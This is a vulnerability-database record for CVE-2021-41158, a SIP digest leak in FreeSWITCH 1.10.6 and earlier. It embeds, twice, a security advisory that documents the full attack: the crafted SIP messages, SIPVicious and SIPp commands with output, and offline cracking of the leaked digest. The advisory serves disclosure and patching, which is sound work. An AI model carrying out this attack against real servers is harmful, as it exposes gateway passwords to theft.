FreeSWITCH versions 1.10.6 and below suffer from a SIP digest leak vulnerability. An attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway.
{"id": "1337DAY-ID-36957", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "FreeSWITCH 1.10.6 SIP Digest Leak Vulnerability", "description": "FreeSWITCH versions 1.10.6 and below suffer from a SIP digest leak vulnerability. An attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway.", "published": "2021-10-26T00:00:00", "modified": "2021-10-26T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://0day.today/exploit/description/36957", "reporter": "Sandro Gauci", "references": [], "cvelist": ["CVE-2021-41158"], "immutableFields": [], "lastseen": "2022-06-27T08:20:03", "viewCount": 137, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-41158"]}, {"type": 
"cve", "idList": ["CVE-2021-41158"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164622"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-41158"]}, {"type": "cve", "idList": ["CVE-2021-41158"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164622"]}]}, "exploitation": null, "vulnersScore": 5.1}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://0day.today/exploit/36957", "sourceData": "# FreeSWITCH vulnerable to SIP digest leak for configured gateways\n\n- Fixed versions: v1.10.7\n- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-05-freeswitch-vulnerable-to-SIP-digest-leak\n- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4\n- Other references: CVE-2021-41158\n- Tested vulnerable versions: <= v1.10.6\n- Timeline:\n - Report date: 2021-04-22\n - Triaged: 2021-04-23\n - Fix provided for testing: 2021-08-13\n - Second fix provided for testing: 2021-09-14\n - Vendor release with fix: 2021-10-24\n - Enable Security advisory: 2021-10-25\n\n## Description\n\nAn attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway.\n\nOne of the ways to perform this attack involves initiating a call to any directory number (e.g. 1002). 
In the default configuration, this can be done via the external SIP profile by calling `sip:1002@freepbx:5080` without authentication, or via the internal SIP profile with authentication by calling `sip:1002@freepbx:5060`.\n\nTo demonstrate this issue, the following external SIP profile configuration was used for the gateway `demo.sipvicious.pro`:\n\n```xml\n<gateway name=\"demo.sipvicious.pro\">\n <param name=\"username\" value=\"1000\"/>\n <param name=\"password\" value=\"1500\"/>\n</gateway>\n```\n\nThe malicious UAC initiates the attack by sending an INVITE to FreeSWITCH. In this example, extension 1001 is calling extension 1002:\n\n```\nINVITE sip:1002@192.168.1.215 SIP/2.0\nVia: SIP/2.0/UDP 192.168.1.215:35273;rport;branch=z9hG4bK-UkZy2ufFodKb5r2T\nMax-Forwards: 70\nFrom: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7\nTo: <sip:1002@192.168.1.215>\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 1 INVITE\nContact: <sip:1001@192.168.1.215:35273;transport=udp>\nContent-Length: 245\nContent-Type: application/sdp\n```\n\nThe call is either manually picked up by the callee, or automatically by its mailbox:\n\n```\nSIP/2.0 200 OK\nVia: SIP/2.0/UDP 192.168.1.215:35273;rport=35273;branch=z9hG4bK-UkZy2ufFodKb5r2T\nFrom: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7\nTo: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 1 INVITE\nContact: <sip:1002@192.168.1.215:5080;transport=udp>\nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit\nAccept: application/sdp\nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY\nSupported: timer, path, replaces\nAllow-Events: talk, hold, conference, refer\nContent-Type: application/sdp\nContent-Disposition: session\nContent-Length: 222\nRemote-Party-ID: \"1002\" <sip:1002@192.168.1.215>;party=calling;privacy=off;screen=no\n```\n\nOnce the callee or mailbox hangs up the call, FreeSWITCH will send a BYE request 
to the malicious UAC:\n\n```\nBYE sip:1001@192.168.1.215:35273;transport=udp SIP/2.0\nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKF7XSHFKDmUN5D\nMax-Forwards: 70\nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp\nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 34695099 BYE\nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit\nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY\nSupported: timer, path, replaces\nReason: Q.850;cause=16;text=\"NORMAL_CLEARING\"\nContent-Length: 0\n\n```\n\nThe malicious UAC will then challenge the BYE request by sending a specially crafted 407 response. The realm value of the `Proxy-Authenticate` header is set to the domain of the target gateway, in our case `demo.sipvicious.pro`:\n\n```\nSIP/2.0 407 Proxy Authentication Required\nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKF7XSHFKDmUN5D\nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp\nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 34695099 BYE\nProxy-Authenticate: Digest realm=\"demo.sipvicious.pro\",nonce=\"4XC2\",algorithm=MD5\n```\n\nFreeSWITCH will reply with the challenge response, based on the password of the gateway:\n\n```\nBYE sip:1001@192.168.1.215:35273;transport=udp SIP/2.0\nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKggQjKa4gH4BrS\nMax-Forwards: 70\nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp\nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7\nCall-ID: Y72a9ZSUQk0zQ23P\nCSeq: 34695100 BYE\nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit\nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY\nSupported: timer, path, replaces\nProxy-Authorization: Digest username=\"1000\", realm=\"demo.sipvicious.pro\", \n nonce=\"4XC2\", algorithm=MD5, \n uri=\"sip:1001@192.168.1.215:35273;transport=udp\", 
\n response=\"10c3a9408b3a97cd6ec8bb3908f30d93\"\nReason: Q.850;cause=16;text=\"NORMAL_CLEARING\"\nContent-Length: 0\n\n```\n\nThe challenge response may then be subjected to a fast offline password bruteforce attack using tools such as hashcat and John the Ripper.\n\nThe above example consists of challenging the BYE message coming from FreeSWITCH. We identified the following additional scenarios which allow exploitation:\n\n- FreeSWITCH initiating a call to a malicious party, for example by making use of the `originate` command in `fs_cli`, where the malicious party challenges the incoming INVITE request.\n- An authenticated SIP endpoint calling another registered malicious endpoint, where the malicious endpoint challenges the incoming INVITE request.\n\n\n## Impact\n\nAbuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. \n\nDo note that the attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party.\n\nAdditionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. 
However, because many gateways are actually public, this information can easily be retrieved.\n\n\n## How to reproduce the issue\n\nTo reproduce this issue, we made use of SIPVicious PRO's SIP digest leak tool as follows:\n\n```\nsipvicious sip crack digestleak udp://172.17.0.2:5060 -u1001:9999999 -e1002 \\\n --challenge-config realm:demo.sipvicious.pro\nINFO[2021-04-19 23:09:17] started digest leak tool on udp://172.17.0.2:5060\nINFO[2021-04-19 23:09:17] call picked up by sip:1002@172.17.0.2\nINFO[2021-04-19 23:09:18] received BYE, challenging that with a 407\nWARN[2021-04-19 23:09:18] digest leaked: response: 6b4f4d6c4d9a086190bd27e410cd1fe4, \\\n realm=demo.sipvicious.pro, nonce=8B05, uri=sip:1001@172.17.0.1:51518;transport=udp, \\\n method=BYE, username=1000\nINFO[2021-04-19 23:09:18] BYE received, terminating call\nWARN[2021-04-19 23:09:21] security issue detected: digest leaked\nINFO[2021-04-19 23:09:21] test complete\n- target: udp://172.17.0.2:5060\n - status: security issue, digest leaked\n results:\n N/A\n issues:\n - digestleak:\n response: 6b4f4d6c4d9a086190bd27e410cd1fe4, realm=demo.sipvicious.pro, \n nonce=8B05, uri=sip:1001@172.17.0.1:51518;transport=udp, \n method=BYE, username=1000\n```\n\nAlternatively, SIPp may be used with a modified version of the Digest leak scenario from [tomeko.net][1] as follows:\n\n```\nsipp 192.168.188.128:5080 -sf uac_digest_leak.xml -s 1002 -m 1\n```\n\nNote: in the [scenario][1] from tomeko.net, make sure to replace the `WWW-Authenticate` header with `Proxy-Authenticate`, set the correct realm (e.g. 
`demo.sipvicious.pro`) and set 183 responses as optional.\n\n[1]: https://tomeko.net/other/sipp/sipp_cheatsheet.php?lang=en\n\n## Solution and recommendations\n\nUpgrade to a version of FreeSWITCH that fixes this issue.\n\nOur suggestion to the FreeSWITCH developers was the following:\n\n> The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted.\n\n> Our recommendation is to create an association between a SIP session for each gateway and its realm, and then a check is put in place for this association when responding to challenges.\n", "category": "web applications", "verified": true}
{"cve": [{"lastseen": "2022-03-23T19:14:38", "description": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. 
Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-26T14:15:00", "type": "cve", "title": "CVE-2021-41158", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41158"], "modified": "2021-10-28T20:57:00", "cpe": [], "id": "CVE-2021-41158", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41158", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "veracode": [{"lastseen": "2022-05-18T01:14:26", "description": "FreeSWITCH is vulnerable to information disclosure. An attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. 
Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-05T10:27:36", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41158"], "modified": "2022-04-19T18:49:02", "id": "VERACODE:32826", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32826/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "alpinelinux": [{"lastseen": "2022-06-22T18:32:51", "description": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. 
Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. 
Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-26T14:15:00", "type": "alpinelinux", "title": "CVE-2021-41158", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41158"], "modified": "2021-10-28T20:57:00", "id": "ALPINE:CVE-2021-41158", "href": "https://security.alpinelinux.org/vuln/CVE-2021-41158", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2021-10-25T17:33:06", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "FreeSWITCH 1.10.6 SIP Digest Leak", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-41158"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164622", "href": "https://packetstormsecurity.com/files/164622/FreeSWITCH-1.10.6-SIP-Digest-Leak.html", "sourceData": "`# FreeSWITCH vulnerable to SIP digest leak for configured gateways \n \n- Fixed versions: v1.10.7 \n- Enable 
Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-05-freeswitch-vulnerable-to-SIP-digest-leak \n- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4 \n- Other references: CVE-2021-41158 \n- Tested vulnerable versions: <= v1.10.6 \n- Timeline: \n- Report date: 2021-04-22 \n- Triaged: 2021-04-23 \n- Fix provided for testing: 2021-08-13 \n- Second fix provided for testing: 2021-09-14 \n- Vendor release with fix: 2021-10-24 \n- Enable Security advisory: 2021-10-25 \n \n## Description \n \nAn attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. \n \nOne of the ways to perform this attack involves initiating a call to any directory number (e.g. 1002). In the default configuration, this can be done via the external SIP profile by calling `sip:1002@freepbx:5080` without authentication, or via the internal SIP profile with authentication by calling `sip:1002@freepbx:5060`. \n \nTo demonstrate this issue, the following external SIP profile configuration was used for the gateway `demo.sipvicious.pro`: \n \n```xml \n<gateway name=\"demo.sipvicious.pro\"> \n<param name=\"username\" value=\"1000\"/> \n<param name=\"password\" value=\"1500\"/> \n</gateway> \n``` \n \nThe malicious UAC initiates the attack by sending an INVITE to FreeSWITCH. 
In this example, extension 1001 is calling extension 1002: \n \n``` \nINVITE sip:1002@192.168.1.215 SIP/2.0 \nVia: SIP/2.0/UDP 192.168.1.215:35273;rport;branch=z9hG4bK-UkZy2ufFodKb5r2T \nMax-Forwards: 70 \nFrom: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nTo: <sip:1002@192.168.1.215> \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 1 INVITE \nContact: <sip:1001@192.168.1.215:35273;transport=udp> \nContent-Length: 245 \nContent-Type: application/sdp \n``` \n \nThe call is either manually picked up by the callee, or automatically by its mailbox: \n \n``` \nSIP/2.0 200 OK \nVia: SIP/2.0/UDP 192.168.1.215:35273;rport=35273;branch=z9hG4bK-UkZy2ufFodKb5r2T \nFrom: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nTo: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 1 INVITE \nContact: <sip:1002@192.168.1.215:5080;transport=udp> \nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit \nAccept: application/sdp \nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY \nSupported: timer, path, replaces \nAllow-Events: talk, hold, conference, refer \nContent-Type: application/sdp \nContent-Disposition: session \nContent-Length: 222 \nRemote-Party-ID: \"1002\" <sip:1002@192.168.1.215>;party=calling;privacy=off;screen=no \n``` \n \nOnce the callee or mailbox hangs up the call, FreeSWITCH will send a BYE request to the malicious UAC: \n \n``` \nBYE sip:1001@192.168.1.215:35273;transport=udp SIP/2.0 \nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKF7XSHFKDmUN5D \nMax-Forwards: 70 \nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp \nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 34695099 BYE \nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit \nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY \nSupported: timer, path, replaces \nReason: Q.850;cause=16;text=\"NORMAL_CLEARING\" 
\nContent-Length: 0 \n \n``` \n \nThe malicious UAC will then challenge the BYE request by sending a specially crafted 407 response. The realm value of the `Proxy-Authenticate` header is set to the domain of the target gateway, in our case `demo.sipvicious.pro`: \n \n``` \nSIP/2.0 407 Proxy Authentication Required \nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKF7XSHFKDmUN5D \nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp \nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 34695099 BYE \nProxy-Authenticate: Digest realm=\"demo.sipvicious.pro\",nonce=\"4XC2\",algorithm=MD5 \n``` \n \nFreeSWITCH will reply with the challenge response, based on the password of the gateway: \n \n``` \nBYE sip:1001@192.168.1.215:35273;transport=udp SIP/2.0 \nVia: SIP/2.0/UDP 192.168.1.215:5080;rport;branch=z9hG4bKggQjKa4gH4BrS \nMax-Forwards: 70 \nFrom: <sip:1002@192.168.1.215>;tag=983BacQc9Q9vp \nTo: <sip:1001@192.168.1.215>;tag=t0D1TEIKQGit7Tf7 \nCall-ID: Y72a9ZSUQk0zQ23P \nCSeq: 34695100 BYE \nUser-Agent: FreeSWITCH-mod_sofia/1.10.7-dev+git~20210325T155256Z~67cec5c3e8~64bit \nAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY \nSupported: timer, path, replaces \nProxy-Authorization: Digest username=\"1000\", realm=\"demo.sipvicious.pro\", \nnonce=\"4XC2\", algorithm=MD5, \nuri=\"sip:1001@192.168.1.215:35273;transport=udp\", \nresponse=\"10c3a9408b3a97cd6ec8bb3908f30d93\" \nReason: Q.850;cause=16;text=\"NORMAL_CLEARING\" \nContent-Length: 0 \n \n``` \n \nThe challenge response may then be subjected to a fast offline password bruteforce attack using tools such as hashcat and John the Ripper. \n \nThe above example consists of challenging the BYE message coming from FreeSWITCH. 
We identified the following additional scenarios which allow exploitation: \n \n- FreeSWITCH initiating a call to a malicious party, for example by making use of the `originate` command in `fs_cli`, where the malicious party challenges the incoming INVITE request. \n- An authenticated SIP endpoint calling another registered malicious endpoint, where the malicious endpoint challenges the incoming INVITE request. \n \n \n## Impact \n \nAbuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. \n \nDo note that the attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. \n \nAdditionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. 
\n \n \n## How to reproduce the issue \n \nTo reproduce this issue, we made use of SIPVicious PRO's SIP digest leak tool as follows: \n \n``` \nsipvicious sip crack digestleak udp://172.17.0.2:5060 -u1001:9999999 -e1002 \\ \n--challenge-config realm:demo.sipvicious.pro \nINFO[2021-04-19 23:09:17] started digest leak tool on udp://172.17.0.2:5060 \nINFO[2021-04-19 23:09:17] call picked up by sip:1002@172.17.0.2 \nINFO[2021-04-19 23:09:18] received BYE, challenging that with a 407 \nWARN[2021-04-19 23:09:18] digest leaked: response: 6b4f4d6c4d9a086190bd27e410cd1fe4, \\ \nrealm=demo.sipvicious.pro, nonce=8B05, uri=sip:1001@172.17.0.1:51518;transport=udp, \\ \nmethod=BYE, username=1000 \nINFO[2021-04-19 23:09:18] BYE received, terminating call \nWARN[2021-04-19 23:09:21] security issue detected: digest leaked \nINFO[2021-04-19 23:09:21] test complete \n- target: udp://172.17.0.2:5060 \n- status: security issue, digest leaked \nresults: \nN/A \nissues: \n- digestleak: \nresponse: 6b4f4d6c4d9a086190bd27e410cd1fe4, realm=demo.sipvicious.pro, \nnonce=8B05, uri=sip:1001@172.17.0.1:51518;transport=udp, \nmethod=BYE, username=1000 \n``` \n \nAlternatively, SIPp may be used with a modified version of the Digest leak scenario from [tomeko.net][1] as follows: \n \n``` \nsipp 192.168.188.128:5080 -sf uac_digest_leak.xml -s 1002 -m 1 \n``` \n \nNote: in the [scenario][1] from tomeko.net, make sure to replace the `WWW-Authenticate` header with `Proxy-Authenticate`, set the correct realm (e.g. `demo.sipvicious.pro`) and set 183 responses as optional. \n \n[1]: https://tomeko.net/other/sipp/sipp_cheatsheet.php?lang=en \n \n## Solution and recommendations \n \nUpgrade to a version of FreeSWITCH that fixes this issue. 
\n \nOur suggestion to the FreeSWITCH developers was the following: \n \n> The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. \n \n> Our recommendation is to create an association between a SIP session for each gateway and its realm, and then a check is put in place for this association when responding to challenges. \n \n## About Enable Security \n \n[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack. \n \n## Disclaimer \n \nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. \n \n## Disclosure policy \n \nThis report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164622/ES2021-05.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}